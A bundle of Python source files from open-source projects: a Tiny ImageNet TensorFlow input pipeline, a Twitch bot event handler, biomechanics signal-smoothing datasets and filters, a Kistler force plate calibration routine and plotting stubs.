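# conns = query_cppn(cppn, (0.0, 1.0), source_layer, target_layer, 0, id_dict)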
def gather_layers(substrate):
'''
Takes a dictionary representation of a substrate and returns
a list of the layers and the sheets within those layers.
substrate -- dictionary representation of a substrate
'''
layers = {}
for i in range(len(substrate)):
layers[i] = []
for key in substrate.keys():
if key[0] == i and key not in layers[i]:
layers[i].append(key)
if layers[i] == []:
del layers[i]
return layers
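if __name__ == '__main__':
    # Minimal self-check (illustrative, not part of the original module):
    # a hypothetical substrate keyed by (layer, sheet) tuples.
    demo = {(0, 0): [(0.0, 0.0)], (1, 0): [(0.0, 1.0)],
            (2, 0): [(-0.5, 0.5)], (2, 1): [(0.5, 0.5)]}
    # expected grouping: {0: [(0, 0)], 1: [(1, 0)], 2: [(2, 0), (2, 1)]}
    print(gather_layers(demo))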
``` |
{
"source": "0three/CAAD-2018-Kunlin",
"score": 2
} |
#### File: CAAD-2018-Kunlin/datasets/tiny_imagenet_input.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from absl import flags
import tensorflow as tf
FLAGS = flags.FLAGS
flags.DEFINE_string('tiny_imagenet_data_dir', None,
'Directory with Tiny Imagenet dataset in TFRecord format.')
def tiny_imagenet_parser(value, image_size, is_training):
"""Parses tiny imagenet example.
Args:
value: encoded example.
image_size: size of the image.
is_training: if True then do training preprocessing (which includes
random cropping), otherwise do eval preprocessing.
Returns:
image: tensor with the image.
label: true label of the image.
"""
keys_to_features = {
'image/encoded': tf.FixedLenFeature((), tf.string, ''),
'label/tiny_imagenet': tf.FixedLenFeature([], tf.int64, -1),
}
parsed = tf.parse_single_example(value, keys_to_features)
image_buffer = tf.reshape(parsed['image/encoded'], shape=[])
image = tf.image.decode_image(image_buffer, channels=3)
image = tf.image.convert_image_dtype(
image, dtype=tf.float32)
# Crop image
if is_training:
bbox_begin, bbox_size, _ = tf.image.sample_distorted_bounding_box(
tf.shape(image),
bounding_boxes=tf.constant([0.0, 0.0, 1.0, 1.0],
dtype=tf.float32,
shape=[1, 1, 4]),
min_object_covered=0.5,
aspect_ratio_range=[0.75, 1.33],
area_range=[0.5, 1.0],
max_attempts=20,
use_image_if_no_bounding_boxes=True)
image = tf.slice(image, bbox_begin, bbox_size)
# resize image
image = tf.image.resize_bicubic([image], [image_size, image_size])[0]
# Rescale image to [-1, 1] range.
image = tf.multiply(tf.subtract(image, 0.5), 2.0)
image = tf.reshape(image, [image_size, image_size, 3])
# Labels are in [0, 199] range
label = tf.cast(
tf.reshape(parsed['label/tiny_imagenet'], shape=[]), dtype=tf.int32)
return image, label
def tiny_imagenet_input(split, batch_size, image_size, is_training):
"""Returns Tiny Imagenet Dataset.
Args:
split: name of the split, "train" or "validation".
batch_size: size of the minibatch.
image_size: size of the one side of the image. Output images will be
resized to square shape image_size*image_size.
is_training: if True then training preprocessing is done, otherwise eval
      preprocessing is done.
Raises:
ValueError: if name of the split is incorrect.
Returns:
Instance of tf.data.Dataset with the dataset.
"""
if split.lower().startswith('train'):
filepath = os.path.join(FLAGS.tiny_imagenet_data_dir, 'train.tfrecord')
elif split.lower().startswith('validation'):
filepath = os.path.join(FLAGS.tiny_imagenet_data_dir, 'validation.tfrecord')
else:
raise ValueError('Invalid split: %s' % split)
dataset = tf.data.TFRecordDataset(filepath, buffer_size=8*1024*1024)
if is_training:
dataset = dataset.shuffle(10000)
dataset = dataset.repeat()
dataset = dataset.apply(
tf.contrib.data.map_and_batch(
lambda value: tiny_imagenet_parser(value, image_size, is_training),
batch_size=batch_size,
num_parallel_batches=4,
drop_remainder=True))
def set_shapes(images, labels):
"""Statically set the batch_size dimension."""
images.set_shape(images.get_shape().merge_with(
tf.TensorShape([batch_size, None, None, None])))
labels.set_shape(labels.get_shape().merge_with(
tf.TensorShape([batch_size])))
return images, labels
# Assign static batch size dimension
dataset = dataset.map(set_shapes)
dataset = dataset.prefetch(tf.contrib.data.AUTOTUNE)
return dataset
def num_examples_per_epoch(split):
"""Returns the number of examples in the data set.
Args:
split: name of the split, "train" or "validation".
Raises:
ValueError: if split name is incorrect.
Returns:
Number of example in the split.
"""
if split.lower().startswith('train'):
return 100000
elif split.lower().startswith('validation'):
return 10000
else:
raise ValueError('Invalid split: %s' % split)
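# Hypothetical usage sketch (assumes TF 1.x and that the
# --tiny_imagenet_data_dir flag points at the TFRecord files):
# dataset = tiny_imagenet_input('train', batch_size=32, image_size=64,
#                               is_training=True)
# images, labels = dataset.make_one_shot_iterator().get_next()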
``` |
{
"source": "0tika/twitch.py",
"score": 2
} |
#### File: twitch.py/twitch/event_handler.py
```python
import logging
import asyncio
from functools import partial
from .events import Event
log = logging.getLogger(__name__)
class _EventTask(asyncio.Task):
def __init__(self, original_coro, event_name, coro, *, loop):
super().__init__(coro, loop=loop)
self.__event_name = event_name
self.__original_coro = original_coro
def __repr__(self):
info = [
('state', self._state.lower()),
('event', self.__event_name),
('coro', repr(self.__original_coro)),
]
if self._exception is not None:
info.append(('exception', repr(self._exception)))
        task = ' '.join(f'{k}={v}' for k, v in info)
return f'<EventTask {task}>'
class EventHandler:
def __init__(self, loop):
self.loop = loop
self._listeners = {}
self._handlers = {Event.CONNECTED: self._handle_connected}
        self._connected = asyncio.Event()  # binds to the running loop when awaited
def __getitem__(self, event):
try:
listener = self._listeners[event]
except KeyError:
listener = []
self._listeners[event] = listener
return listener
def register(self, event, coro):
real_coro = coro.func if isinstance(coro, partial) else coro
coro_name = real_coro.__name__
if not asyncio.iscoroutinefunction(real_coro):
raise TypeError(
f'{coro_name} '
f'must be a coroutine function to be registered')
event = f'on_{event}' if not event.startswith('on_') else event
def get_name(coro):
return coro.func.__name__ if isinstance(coro, partial) else \
coro.__name__
coros = getattr(self, event, [])
# ensure the same on_message coro can't be registered twice
if coro_name not in [get_name(c) for c in coros]:
coros.append(coro)
setattr(self, event, coros)
def emit(self, event, *args, **kwargs):
handler = self._handlers.get(event)
if handler:
log.info(f'invoking custom handler for {event}')
handler()
log.info(f'emitting event {event}')
method = f'on_{event}'
listeners = self._listeners.get(event)
if listeners:
removed = []
for i, (future, condition) in enumerate(listeners):
if future.cancelled():
removed.append(i)
continue
try:
result = condition(*args)
except Exception as exc:
future.set_exception(exc)
removed.append(i)
else:
if result:
if len(args) == 0:
future.set_result(None)
elif len(args) == 1:
future.set_result(args[0])
else:
future.set_result(args)
removed.append(i)
if len(removed) == len(listeners):
self._listeners.pop(event)
else:
for idx in reversed(removed):
del listeners[idx]
try:
coros = getattr(self, method)
self._schedule_event(coros, method, *args, **kwargs)
except AttributeError:
pass
def _schedule_event(self, coros, event_name, *args, **kwargs):
# schedule the tasks
for wrapped_coro, coro in [
(_run_event(coro, event_name, *args, **kwargs), coro)
for coro in coros]:
_EventTask(original_coro=coro, event_name=event_name,
coro=wrapped_coro, loop=self.loop)
@property
def connected(self):
return self._connected
def clear_connected(self):
self._connected.clear()
def _handle_connected(self):
self._connected.set()
async def _on_run_error(method, err):
log.info(f'ignoring exception in {method}: {err}')
async def _run_event(coro, event_name, *args, **kwargs):
try:
await coro(*args, **kwargs)
except asyncio.CancelledError:
pass
except Exception as e:
try:
await _on_run_error(event_name, str(e))
except asyncio.CancelledError:
pass
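# Hypothetical usage sketch (the relative import of Event means this module
# runs only inside the package; names below are illustrative):
# loop = asyncio.get_event_loop()
# handler = EventHandler(loop)
#
# async def on_ping(payload):
#     print('ping:', payload)
#
# handler.register('ping', on_ping)
# handler.emit('ping', 'hello')  # schedules on_ping on the loop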
``` |
{
"source": "0todd0000/autofilter1d",
"score": 3
} |
#### File: autofilter1d/smooth1d/datasets.py
```python
from math import pi,sin
import numpy as np
dataset_names = ['Challis1999a',
'Challis1999b',
'Challis1999c',
'Challis1999d',
'Challis1999e',
'Null',
'Vaughan1982']
class _Dataset(object):
'''
Abstract template class for all datasets
'''
author = None #Author's name
name = None #Dataset name
year = None #Year of publication / dissemination
y = None #The 1D datum continuum
t = None #Time vector
dt = None #Duration between time nodes (s)
hz = None #Sample frequency (Hz)
def get_data(self):
'''
Get time vector and 1D datum continuum
Arguments:
(None)
Returns:
*t* : time vector (1D NumPy array)
*y* : 1D datum continuum (1D NumPy array)
'''
return self.t, self.y
def get_name(self):
'''
Get dataset name.
Arguments:
(None)
Returns:
*s* : dataset name (str)
'''
s = self.author
if self.year is not None:
s += ' (%s)' %self.year
if self.name is not None:
s += ' %s' %self.name
return s
def get_namep(self):
s = self.author
if self.year is not None:
s += ' %s' %self.year
if self.name is not None:
s += ' %s' %self.name
return s
class Null(_Dataset):
'''
A null 1D datum; y(q)=0 for all q
'''
def __init__(self):
self.author = 'Null'
self.name = None
self.year = None
self.t = np.linspace(0, 1, 101)
self.y = np.zeros(101)
self.dt = 0.01
self.hz = 1 / self.dt
class Vaughan1982(_Dataset):
'''
    Data available in Vaughan (1982, p.379, Table 1)
Vaughan CL (1982). Smoothing and differentiation of displacement-time data: an application of splines and digital filtering. International Journal of Bio-Medical Computing 13, 375–386.
'''
def __init__(self):
self.author = 'Vaughan'
self.name = None
self.year = 1982
self.y = np.array([1.770,1.757,1.748,1.740,1.726, 1.715,1.698,1.683,1.667,1.651,1.632,1.612,1.593,1.572,1.551,1.530,1.507,1.483,1.445,1.428,1.401,1.371,1.343,1.311,1.279,1.245,1.212,1.175,1.143,1.105,1.063,1.029,0.991,0.953,0.910,0.869,0.823,0.779,0.732,0.691,0.644,0.595,0.548,0.501,0.447,0.395,0.350,0.294,0.243,0.185])
self.dt = 0.00985
self.hz = 1 / self.dt
self.t = self.dt * np.arange( self.y.size )
class _Challis1999(_Dataset):
CONST_W0 = 2 * pi
CONST_A = np.array([16, 12, 6.3, 0.5, 1.2, 0.6, 0.3, 0.2, 0.1, 0.09, 0.04, 0.06, 0.01])
CONST_PHI = np.array([0.99, 0.23, -2.97, 0.0, -3.13, -0.84, 2.14, 0.58, 1.15, 0.17, -1.13, 0.76, -1.21])
author = 'Challis'
year = 1999
def __init__(self):
self.dt = self.t[1] - self.t[0]
self.hz = 1 / self.dt
def get_namep(self):
return '%s %s, Dataset %s' %(self.author, self.year, self.name)
class Challis1999A(_Challis1999):
'''
Dataset A from:
<NAME> (1999). A procedure for the automatic determination of filter cutoff frequency for the processing of biomechanical data. Journal of Applied Biomechanics 15, 303-317.
'''
def __init__(self):
w0,a,phi = self.CONST_W0, self.CONST_A, self.CONST_PHI
self.name = 'A'
self.t = np.linspace(0, 1, 91)
self.y = np.array([(a * np.sin( np.arange(1,14) * w0 * tt + phi)).sum() for tt in self.t])
super().__init__()
class Challis1999B(_Challis1999):
'''
Dataset B from:
<NAME> (1999). A procedure for the automatic determination of filter cutoff frequency for the processing of biomechanical data. Journal of Applied Biomechanics 15, 303-317.
'''
def __init__(self):
self.name = 'B'
self.t = np.linspace(0, 1, 91)
self.y = self._get_y()
super().__init__()
def _get_y(self):
w0,a,phi = self.CONST_W0, self.CONST_A, self.CONST_PHI
t = self.t
n,k,dt = t.size, 40.0, t[1] - t[0]
p = (dt * (n-1)) - (0.5*dt)
f = []
for tt in t:
ff = k * (tt- 0.5*p)**2
for i,(aa,pphi) in enumerate( zip(a,phi) ):
ff += (aa) * sin( (i+1) * w0 * tt + pphi)
f.append(ff)
return np.array(f)
class Challis1999C(_Challis1999):
'''
Dataset C from:
<NAME>H (1999). A procedure for the automatic determination of filter cutoff frequency for the processing of biomechanical data. Journal of Applied Biomechanics 15, 303-317.
'''
def __init__(self):
self.name = 'C'
self.t = np.linspace(0, 1, 91)
self.y = self._get_y()
super().__init__()
def _get_y(self):
t = self.t
f = np.zeros(t.size)
i0 = t <= 0.85
i1 = t > 0.85
f[i0] = (-55.1 * t[i0]) + (427 * t[i0]**3) + (-342 * t[i0]**4)
f[i1] = 579.97 - (304.32 * t[i1]) + (-241.77 * t[i1]**-1)
return np.array(f)
class Challis1999D(_Challis1999):
'''
Dataset D from:
<NAME>H (1999). A procedure for the automatic determination of filter cutoff frequency for the processing of biomechanical data. Journal of Applied Biomechanics 15, 303-317.
'''
def __init__(self):
self.name = 'D'
self.t = np.linspace(0, 5, 200)
self.y = self._get_y()
super().__init__()
def _get_y(self):
t = self.t
f = np.zeros(t.size)
i0 = t <= 4.
i1 = t > 4.0
f[i0] = pi**-2 * np.sin( pi * t[i0] )
f[i1] = pi**-1 * ( t[i1] - 4 )
return f
class Challis1999E(_Challis1999):
'''
Dataset E from:
<NAME> (1999). A procedure for the automatic determination of filter cutoff frequency for the processing of biomechanical data. Journal of Applied Biomechanics 15, 303-317.
'''
def __init__(self):
self.name = 'E'
self.t = np.linspace(0, 1, 128)
self.y = self._get_y()
super().__init__()
def _get_y(self):
t = self.t
B = 10000
f = B * t**2 * (t-0.1) * (t-0.2) * (t-0.5) * (t-0.75) * (t-0.95) * (t-1)**2 + t**2
return f
dataset_classes = [Null, Vaughan1982, Challis1999A, Challis1999B, Challis1999C, Challis1999D, Challis1999E]
def load(datasetname):
assert isinstance(datasetname, str) and (datasetname in dataset_names), 'datasetname must be one of %s' %dataset_names
if datasetname=='Null':
dataset = Null()
    elif datasetname=='Challis1999a':
dataset = Challis1999A()
elif datasetname=='Challis1999b':
dataset = Challis1999B()
elif datasetname=='Challis1999c':
dataset = Challis1999C()
elif datasetname=='Challis1999d':
dataset = Challis1999D()
elif datasetname=='Challis1999e':
dataset = Challis1999E()
elif datasetname=='Vaughan1982':
dataset = Vaughan1982()
else:
raise( ValueError('Unknown dataset name: %s' %datasetname) )
t,y = dataset.get_data()
return t,y
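if __name__ == '__main__':
    # Minimal self-check (not part of the original module): load one dataset
    # and report its size.
    t, y = load('Vaughan1982')
    print(t.size, y.size)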
```
#### File: autofilter1d/smooth1d/smooth.py
```python
import os
import ctypes
from math import sqrt,log
import numpy as np
import scipy.signal
from statsmodels.robust import mad
import pywt
from . import util
round_up_to_odd = util.round_up_to_odd
paddon = util.paddon
paddoff = util.paddoff
def butter_lowpass(y, dt, cutoff, order=2):
'''
Lowpass Butterworth filter
INPUTS:
*y* : 1D measurement ( (Q,) array )
*dt* : inter-node duration = (1 / sampling frequency)
*cutoff* : cut-off frequency (Hz) (int or float)
*order* : filter order (int)
OUTPUTS:
*ys* : smoothed 1D measurement ( (Q,) array )
'''
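    # correct the cutoff for the dual (forward-backward) pass applied by filtfilt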
cutoff = cutoff / ( 2**0.5 - 1 ) ** (0.5/order)
b,a = scipy.signal.butter(order, 2*cutoff*dt, btype='lowpass')
fdata = scipy.signal.filtfilt( b, a, y, padtype='odd')
return fdata
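# Hypothetical usage sketch: smooth a noisy 1 Hz sine sampled at 100 Hz with a
# 6 Hz cutoff (all values illustrative):
# t = np.arange(0, 1, 0.01)
# y = np.sin(2 * np.pi * t) + 0.1 * np.random.randn(t.size)
# ys = butter_lowpass(y, dt=0.01, cutoff=6, order=2)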
def embed(time, y, cutoffs=None, order=2):
'''
Embed a measurement in an abstract 2D time-cutoff space
INPUTS:
*time* : 1D time vector ( (Q,) array )
*y* : 1D measurement ( (Q,) array )
*cutoffs* : cut-off frequencies (Hz) (list of int or float)
*order* : filter order (int)
OUTPUTS:
*Ys* : smoothed, embedded 1D measurement ( (J,Q) array )
'''
dt = time[1] - time[0]
    cutoffs = np.linspace(5, 10, 50) if cutoffs is None else np.asarray(cutoffs)  # accept list or array input
ncut = cutoffs.size
if y.ndim == 1:
ye = np.array([butter_lowpass(y, dt, xx, order=order) for xx in cutoffs])
elif y.ndim == 2:
J,Q = y.shape
ye = np.zeros( (J,ncut,Q) )
for i,xx in enumerate(cutoffs):
ye[:,i,:] = butter_lowpass(y, dt, xx, order=order)
return ye
def _filtmat(dt, cutoff, order, data):
'''
(Code translated from a MATLAB implementation written by <NAME>;
MATLAB code received by email without license)
'''
return butter_lowpass(data, dt, cutoff, order)
def _autocorr(nsignal, dt, order):
'''
(Code translated from a MATLAB implementation written by <NAME>;
MATLAB code received by email without license)
'''
colow = 0.5
coup = 0.25 / dt
for i,co in enumerate(np.arange(colow, coup+0.1, 0.1)):
ssignal = _filtmat(dt, co, order, nsignal)
resid = ssignal - nsignal
acorr = np.correlate(resid, resid, mode='full')
acorr /= acorr.max()
f = np.sum( np.abs(acorr) )
if i==0:
fmin = f #objective function
coopt = co #(currently) optimum cutoff frequency
s = ssignal #(currently) optimally smoothed signal
if f < fmin:
fmin = f
coopt = co
s = ssignal
return s,coopt
def autocorr(y, order=2, time=None):
'''
Autocorrelation filtering method.
(Code translated from a MATLAB implementation written by <NAME>;
MATLAB code received by email from author, without license)
Reference:
<NAME> (1999). A procedure for the automatic determination of filter
cutoff frequency for the processing of biomechanical data. Journal of
Applied Biomechanics 15, 303–317.
'''
dt = 1 if time is None else time[1] - time[0]
if y.ndim == 1:
ys,cutoff = _autocorr(y, dt, order)
else:
ys,xopt = [],[]
for yy in y:
s,c = _autocorr(yy, dt, order)
ys.append(s)
xopt.append(c)
ys,cutoff = np.array(ys), np.array(xopt)
return ys
def _gcvspl(x, y, m=2, library='gcvspl.so'):
'''
Generalized cross-validatory spline filtering
(Using this function requires a compiled dynamic link library.)
(This code is distributed with a library called "gcvspl.so" which
was compiled for Mac using the source code from Twisk (1994), link below.)
https://isbweb.org/resources/software-resources/137-signal-processing-software/497-gcvspl-in-c-d-twisk
Reference:
<NAME>, <NAME> (1979). Smoothing noisy data with splines functions. Numerische Mathematik 31, 377–403.
'''
### load DLL:
fnameSO = os.path.join( os.path.dirname(__file__), library)
L = ctypes.CDLL(fnameSO)
### assemble required variable types
c_int = ctypes.c_int
c_double = ctypes.c_double
p_double = np.ctypeslib.ndpointer(ctypes.c_double)
p_int = np.ctypeslib.ndpointer(ctypes.c_int32)
### specify argument types
L.gcvspl.argtypes = [p_double, p_double, p_double, c_int, c_int, p_double, c_double, p_double, c_int]
L.splder.argtypes = [c_int, c_int, c_int, c_double, p_double, p_double, p_int, p_double]
L.splder.restype = c_double
K = 1
NN = x.size
MM = 10
MM2 = 2*MM
NWK = NN+6*(NN*MM+1)
c = np.zeros(NN)
wk = np.zeros(NWK)
q = np.zeros(MM+1)
v = np.zeros(MM2)
q0 = np.zeros(NN)
q1 = np.zeros(NN)
q2 = np.zeros(NN)
wy = 1.0
wx = np.ones(NN)
n = NN
var = -1.0
ier = 0
L.gcvspl(x, y, wx, m, n, c, var, wk, ier)
Q = NN
ider = 0 #derivative order
t = x.copy()
l = 2 * np.ones(Q, dtype=np.int32)
q = np.zeros(2*m)
a = np.array([L.splder(ider, m, n, tt, x, c, l, q) for tt in t])
return a
def gcvspl(x, y, m=3):
'''
Generalized cross-validatory spline filtering
(Using this function requires a compiled dynamic link library.)
(This code is distributed with a library called "gcvspl.so" which
was compiled for Mac using the source code from Twisk (1994), link below.)
https://isbweb.org/resources/software-resources/137-signal-processing-software/497-gcvspl-in-c-d-twisk
Reference:
<NAME>, <NAME> (1979). Smoothing noisy data with splines functions. Numerische Mathematik 31, 377–403.
INPUTS:
*x* : 1D time vector ( (Q,) array )
*y* : 1D measurement ( (Q,) array )
*m* : half-order (int); spline degree = (2*m - 1)
OUTPUTS:
*ys* : smoothed 1D measurement ( (J,Q) array )
'''
if y.ndim==2:
ys = np.array([_gcvspl(x, yy, m) for yy in y])
else:
ys = _gcvspl(x, y, m)
return ys
def _ssa(x, L=5, ncomponents=2):
'''
Singular Spectrum Analysis smoother
Adapted from the MATLAB code "ssa.m" by <NAME>
The original MATLAB code was downloaded on 2017-11-20 from:
https://www.mathworks.com/matlabcentral/fileexchange/8115-singular-spectrum-analysis-smoother?s_tid=prof_contriblnk
References:
<NAME>., <NAME>., <NAME>., 2001. Analisys of Time Series Structure - SSA and Related Techniques. Chapman & Hall/CR
<NAME>., <NAME>, <NAME>., (2005), Application of singular spectrum analysis to the smoothing of raw kinematic signals. J. Biomech. 38, 1085-1092.
'''
#Step 1: Build trajectory matrix:
N = x.size
L = (N - L) if (L > N/2) else L
K = N - L + 1
X = np.zeros((L, K))
for i in range(K):
X[:L, i] = x[i:L+i]
X = np.matrix( X )
#Step 2: SVD
U,s,v = np.linalg.svd(X)
V = X.T * U
rc = U * V.T
#Step 3: Grouping
I = range(ncomponents)
rca = U[:, I] * V.T[I]
#Step 4: Reconstruction
y = np.zeros(N)
Lp = min(L, K)
Kp = max(L, K)
for k in range(0, Lp-1):
for m in range(k+1):
y[k] += (1.0/(k+1)) * rca[m,k-m]
for k in range(Lp-1, Kp):
for m in range(Lp):
y[k] += (1.0/Lp) * rca[m,k-m]
for k in range(Kp, N):
for m in range(k-Kp+1, N-Kp+1):
y[k] += (1.0/(N-k)) * rca[m,k-m]
return y
def ssa(y, L, ncomponents=2):
'''
Singular Spectrum Analysis smoother
Adapted from the MATLAB code "ssa.m" by <NAME>
The original MATLAB code was downloaded on 2017-11-20 from:
https://www.mathworks.com/matlabcentral/fileexchange/8115-singular-spectrum-analysis-smoother?s_tid=prof_contriblnk
References:
<NAME>., Nekrutkin, V., <NAME>., 2001. Analisys of Time Series Structure - SSA and Related Techniques. Chapman & Hall/CR
<NAME>., <NAME>, <NAME>., (2005), Application of singular spectrum analysis to the smoothing of raw kinematic signals. J. Biomech. 38, 1085-1092.
'''
if y.ndim==2:
ys = np.array([_ssa(yy, L, ncomponents) for yy in y])
else:
ys = _ssa(y, L, ncomponents)
return ys
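# Hypothetical usage sketch (the window length L and the number of retained
# components are analysis choices):
# y = np.sin(np.linspace(0, 2 * np.pi, 101)) + 0.1 * np.random.randn(101)
# ys = ssa(y, L=20, ncomponents=2)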
def _wavelet_single(y):
'''
Wachowiak (2000)
Following code from:
http://jseabold.net/blog/2012/02/23/wavelet-regression-in-python/
'''
yy,nadd = paddon(y)
coefs = pywt.wavedec(yy, 'db8', level=None, mode='per')
sigma = mad( coefs[-1] )
uthresh = sigma * sqrt( 2*log(len(y)) )
denoised = coefs[:]
denoised[1:] = (pywt.threshold(i, value=uthresh, mode='soft') for i in denoised[1:])
ys = pywt.waverec(denoised, 'db8', mode='per')
ys = paddoff(ys, nadd)
return ys
def wavelet(y):
'''
Wachowiak (2000)
Following code from:
http://jseabold.net/blog/2012/02/23/wavelet-regression-in-python/
'''
if y.ndim == 1:
ys = _wavelet_single(y)
else:
ys = np.array([_wavelet_single(yy) for yy in y])
return ys
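# Hypothetical usage sketch:
# y = np.cumsum(np.random.randn(128))
# ys = wavelet(y)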
def wiener(y, window_rel=0.05):
'''
    Wiener filter
This is a convenience interface to scipy.signal.wiener
'''
n = y.size if y.ndim==1 else y.shape[1]
window = round_up_to_odd( window_rel * n )
    if y.ndim == 1:
        ys = scipy.signal.wiener(y, window, None)
    else:
        ys = np.array([scipy.signal.wiener(yy, window, None) for yy in y])
return ys
``` |
{
"source": "0todd0000/BMC",
"score": 3
} |
#### File: BMC/functions/kistler_fp_cal.py
```python
from __future__ import division, print_function
import numpy as np
__author__ = '<NAME>, https://github.com/demotu/BMC'
__version__ = 'kistler_fp_cal.py v.1 2014/12/12'
def kistler_fp_cal(data, S_matrix=None, fxfy_range=0, fz_range=0, origin=None,
fp_type=3, show=False, axs=None):
"""Kistler force plate calibration
In order to get proper signals of a Kistler force plate, we have to
calibrate the acquired data according to the factory calibration (i.e.,
    transform the read values in volts of the 8 channels to values in newtons
for fx12, fx34, fy14, fy23, fz1, fz2, fz3, fz4) and then calculate the
resultant forces (Fx, Fy, Fz), resultant moments of force (Mx, My, Mz),
and center of pressure (COPx, COPy) quantities. See [1]_ and [2]_
Parameters
----------
data : array_like [fx12, fx34, fy14, fy23, fz1, fz2, fz3, fz4]
Kistler force plate data (8 columns, in Volts)
S_matrix : array_like
sensitivity matrix for Kistler force plate (8 columns) and at least
one row
fxfy_range : number [0, 1, 2, 3], optional
Fx/Fy amplifier range used in the data acquisition
Fx/Fy [kN]: 0.25, 1.25, 2.5, 5
This is only used if the sensitivity matrix has more than one row
and the first four columns of the corresponding row are selected.
fz_range : number [0, 1, 2, 3], optional
Fz amplifier range used in the data acquisition
Fz [kN]: 1, 5, 10, 20
This is only used if the sensitivity matrix has more than one row
and the last four columns of the corresponding row are selected.
origin : array_like [a, b, az0]
coordinates of the force plate origin (az0 is negative, in meters)
fp_type : number [1, 2, 3, 4]
type of force plate to be used in the COP correction
1: type 9281E11
2: type 9281E and 9281EA (SN: <= 616901)
3: type 9281E and 9281EA (SN: >= 616902)
4: type 9287C, 9287CA
show : bool, optional (default = False)
if True (1), plot data in matplotlib figure.
axs : a matplotlib.axes.Axes instance, optional (default = None).
Returns
-------
grf : numpy array [Fx, Fy, Fz, Mx, My, Mz]
ground reaction force data
cop : numpy array [COPx, COPy]
center of pressure data
References
----------
.. [1] http://isbweb.org/software/movanal/vaughan/kistler.pdf
.. [2] http://nbviewer.ipython.org/github/demotu/BMC/blob/master/notebooks/KistlerForcePlateCalculation.ipynb
"""
    if S_matrix is None:
# sensitivity matrix for Kistler force plate 9281EA Serial no. 4402018
# calibrated range
# Fx/Fy [kN]: 0.25, 1.25, 2.5, 5
# Fz [kN]: 1, 5, 10, 20
S_matrix = np.array([[38.117, 37.723, 38.062, 38.008, 19.492, 19.445, 19.426, 19.457],
[ 7.623, 7.545, 7.212, 7.602, 3.898, 3.889, 3.885, 3.891],
[ 3.803, 3.761, 3.800, 3.796, 1.951, 1.945, 1.944, 1.948],
[ 1.901, 1.881, 1.900, 1.898, 0.976, 0.973, 0.972, 0.974]])
S_matrix = np.atleast_2d(S_matrix)
    S_matrix = np.hstack((S_matrix[fxfy_range, 0:4], S_matrix[fz_range, 4:8]))
    if origin is None:
# origin for Kistler force plate 9281EA Serial no. 4402018
origin = np.array([0.120, 0.200, -0.048])
a, b, az0 = np.hsplit(np.asarray(origin), 3)
# COP correction coefficients
if fp_type == 1: # Type 9281E11
Px = [2.51997E-15, -2.18826E-10, -2.69254E-07, -4.85912E-11, 4.55731E-6, -4.18892E-2]
Py = [2.83750E-15, -1.00051E-10, -2.05349E-06, -1.16374E-10, 4.71553E-6, 6.89265E-2]
elif fp_type == 2: # Type 9281E and 9281EA (SN: <= 616901)
Px = [1.1604E-14, -8.39091E-10, -1.44293E-6, -2.85927E-10, 2.05575E-5, -0.113525]
Py = [1.27251E-14, -3.13238E-10, -3.33888E-6, -6.49641E-10, 1.53937E-5, 1.12624E-1]
elif fp_type == 3: # Type 9281E and 9281EA (SN: >= 616902)
Px = [7.92063E-15, -5.821E-10, -2.77102E-6, -1.76083E-10, 1.29695E-5, -0.0413979]
Py = [8.82869E-15, -2.48554E-10, -1.76282E-6, -4.22186E-10, 1.2091E-5, 5.16279E-2]
elif fp_type == 4: # Type 9287C, 9287CA
Px = [1.72454E-16, -4.82275E-11, 3.30016E-7, -9.46569E-12, 2.78736E-6, -8.20399E-3]
Py = [2.20428E-16, -1.80864E-11, -7.30249E-7, -3.03080E-11, 2.64974E-6, 5.41166E-2]
else:
Px = []
Py = []
# Calibration
data = 1000*data/S_matrix
fx12, fx34, fy14, fy23, fz1, fz2, fz3, fz4 = np.hsplit(data, 8)
# Medio-lateral force
Fx = fx12 + fx34
# Anterior-posterior force
Fy = fy14 + fy23
# Vertical force
Fz = fz1 + fz2 + fz3 + fz4
# Plate moment about X-axis
Mx = b * (fz1 + fz2 - fz3 - fz4)
# Plate moment about Y-axis
My = a * (-fz1 + fz2 + fz3 - fz4)
# Plate moment about Z-axis
Mz = b * (-fx12 + fx34) + a * (fy14 - fy23)
# Plate moment about top plate surface
Mx = Mx + Fy*az0
# Plate moment about top plate surface
My = My - Fx*az0
# X-Coordinate of force application point (COP)
ax = -My / Fz
# Y-Coordinate of force application point (COP)
ay = Mx / Fz
# Coefficient of Friction x-component
#COFx = Fx / Fz
# Coefficient of Friction y-component
#COFy = Fy / Fz
# COP correction
if Px:
Dax = (Px[0]*ay**4 + Px[1]*ay**2 + Px[2])*ax**3 + (Px[3]*ay**4 + Px[4]*ay**2 + Px[5])*ax
ax = ax - Dax
if Py:
Day = (Py[0]*ax**4 + Py[1]*ax**2 + Py[2])*ay**3 + (Py[3]*ax**4 + Py[4]*ax**2 + Py[5])*ay
ay = ay - Day
# Free moment
Mz = Mz - Fy*ax + Fx*ay
grf = np.hstack((Fx, Fy, Fz, Mx, My, Mz))
cop = np.hstack((ax, ay))
if show:
_plot(grf, cop, axs)
return grf, cop
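# Hypothetical usage sketch (synthetic 8-channel amplifier data in volts;
# amplifier ranges and plate type are illustrative):
# data = 0.1 * np.random.randn(1000, 8)
# grf, cop = kistler_fp_cal(data, fxfy_range=1, fz_range=1, fp_type=3)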
def _plot(grf, cop, axs):
"""Plot results of the detect_peaks function, see its help."""
try:
import matplotlib.pyplot as plt
except ImportError:
print('matplotlib is not available.')
else:
grf = np.hstack((grf, cop))
if axs is None:
_, axs = plt.subplots(4, 2, figsize=(8, 6), sharex=True)
axs = axs.flatten()
ylabel = ['Fx [N]', 'Fy [N]', 'Fz [N]',
'Mx [Nm]', 'My [Nm]', 'Mz [Nm]', 'COPx [m]', 'COPy [m]']
for i, axi in enumerate(axs):
axi.plot(grf[:, i], 'b', lw=1)
axi.set_ylabel(ylabel[i], fontsize=14)
axi.yaxis.set_major_locator(plt.MaxNLocator(4))
axi.yaxis.set_label_coords(-.2, 0.5)
axs[6].set_xlabel('Sample #', fontsize=14)
axs[7].set_xlabel('Sample #', fontsize=14)
plt.suptitle('Ground reaction force data', y=1.02, fontsize=16)
plt.tight_layout(h_pad=.1)
# plt.grid()
plt.show()
``` |
{
"source": "0todd0000/ci1d",
"score": 3
} |
#### File: plot/plotly/_base.py
```python
class PatchLine(object):
def plot(self, ax, w=0.1, ec=None, fc='b', lw=1):
pass
class MultiColorPatchLine(PatchLine):
def plot(self, ax, w=0.1, cmap='jet', alpha=0.5, ec=None, ew=1, vmin=None, vmax=None, th=None):
pass
```
#### File: plot/plotly/colors.py
```python
from copy import deepcopy
import numpy as np
from matplotlib import pyplot as plt
from matplotlib import colors
